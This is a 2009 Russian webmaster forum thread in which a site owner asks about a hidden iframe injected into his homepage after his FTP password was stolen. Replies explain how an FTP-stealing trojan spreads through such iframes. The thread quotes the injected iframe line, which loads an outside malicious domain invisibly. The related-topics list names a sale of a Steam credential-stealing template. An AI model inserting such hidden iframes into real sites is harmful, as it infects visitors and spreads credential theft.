X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Вирусы, трояны, своровали пароль
Robot-sgibatel
Robot-sgibatel
Topic Starter сообщение 1.4.2009, 20:00; Ответить: Robot-sgibatel
Сообщение #1


Знаю что теоритически пароль могут похитить с компа если он хранится в каком либо файле, но никогда не беспокоился по этому поводу - своего крупного сайта, который мечтают поломать все хакеры у меня нет, да и касперский всегда запущен. Но недавно похоже кто-то кто-то проломал мой сайт, но ничего серьезного не сделал, а просто появилась строка внизу главной страницы.
<iframe src="http://tosto-vik.ru/index.php" width="0" height="0" style="display:none;"></iframe>

Я спросил у хостера, он сказал что кто-то знает мой фтп пароль, и сказал чтоб я его поменял. Я поменял пароль, проверил комп на вирусы, ничего не нашел. Но в этот же день вечером каспер сам нашел трояна в диске С :) . Но мне почему - то кажется что мой пароль украли со стороны хостера, а не с моего компа. Вобщем у меня вопрос - насколко все это серьезно, как работают эти трояны. Разрешаете ли вы своему тоталу хранить пароли? Храните ли вы пароль в жезле Оперы (у кого она есть) ?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FordogeN
FordogeN
сообщение 1.4.2009, 20:34; Ответить: FordogeN
Сообщение #2


пароли сохраняю в мозиле, оперу юзают гости и пароли тоже сохраняют.
фтп юзаю через эксплорер (через папку, не через ИЕ)


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Galeodor
Galeodor
сообщение 1.4.2009, 20:53; Ответить: Galeodor
Сообщение #3


пароли все храню в отдельной программе, где поставлен 128битный код на доступ ко всей базе паролей.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ZiTosS
ZiTosS
сообщение 1.4.2009, 21:25; Ответить: ZiTosS
Сообщение #4


Bender, была такая же проблема, пароли не хранил ни в total ни в браузерах.
Вообще доступ получить могут как с вашей стороны, так и со стороны хостера, узнав логин и пароль к FTP.

Такой тип троянов свойственен со стороны пользователей, слабо защищенных в интернете.
Такой троян работает лавинно, отсылает ли троян данные куда-то не известно. Лавинность заключается в том, что пользователи заходящие на сайт, автоматом получают себе троян на комп, с помощью этого фрейма вставленного в index.* Затем он себе лежит преспокойно в пассивном режиме на компе пользователя до тех пор, пока не будет идти обращение к FTP-протоколу., тут то он и начинает свои деяния. Он получает данные FTP введённые пользователем, подключается и так же вставляет в index.*, рекурсивно пробегаясь по всей структуре сайта, фрейм с трояном.
Таким образом распрространение этого трояна лавинно нарастает. Величина роста зависит от незащещённости пользовательских компьютеров.

Я никогда не сохраняю свои пароли в total commander или в браузерных аддонах, так как это вдвойне не безопасно, особенно при доступе к компьютеру из сети.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Robot-sgibatel
Robot-sgibatel
Topic Starter сообщение 2.4.2009, 11:11; Ответить: Robot-sgibatel
Сообщение #5


Так что эта строка и была вирусом?
<iframe src="http://tosto-vik.ru/index.php" width="0" height="0" style="display:none;"></iframe>

Почему тогда касперский ничего не говорил?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Galeodor
Galeodor
сообщение 2.4.2009, 13:05; Ответить: Galeodor
Сообщение #6


(Bender @ 2.4.2009, 11:11) *
Так что эта строка и была вирусом?

Почему тогда касперский ничего не говорил?

1)это не вирус, это айфрейм.
2)дураки есть везде, даже в Касперском.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FordogeN
FordogeN
сообщение 2.4.2009, 15:35; Ответить: FordogeN
Сообщение #7


Может просто новый какой то троян. У меня когда был кашпер - он вижжал, но не на все.
Именно от таких ифреймовых лучше всего защищает аваст. Проверено не одним мной!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Galeodor
Galeodor
сообщение 2.4.2009, 21:21; Ответить: Galeodor
Сообщение #8


на совсем древние не визжит.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Удаляю вирусы на CMS WordPress. Чищу качественно и быстро, даю гарантию.
10 maxix 6475 21.5.2018, 16:59
автор: maxix
Открытая тема (нет новых ответов) [Продам] Шаблон сайта, отправляющего логин и пароль Steam
0 Jagailo 6142 19.8.2014, 21:32
автор: -Jagailo-
Открытая тема (нет новых ответов) Удаляю вирусы с сайтов!!!
0 danilhtml 3359 3.1.2013, 19:26
автор: -danil-html-
Горячая тема (нет новых ответов) Protrafv2.com Льет Ифреим На Вирусы.
Protrafv2.com вирусная пп.
45 Virus_07 17023 7.10.2010, 0:41
автор: butcher
Открытая тема (нет новых ответов) Advmaker.ru распространяет вирусы?
3 Aone 3613 27.9.2009, 0:09
автор: tokito


 



RSS Текстовая версия Сейчас: 26.4.2024, 1:15
Дизайн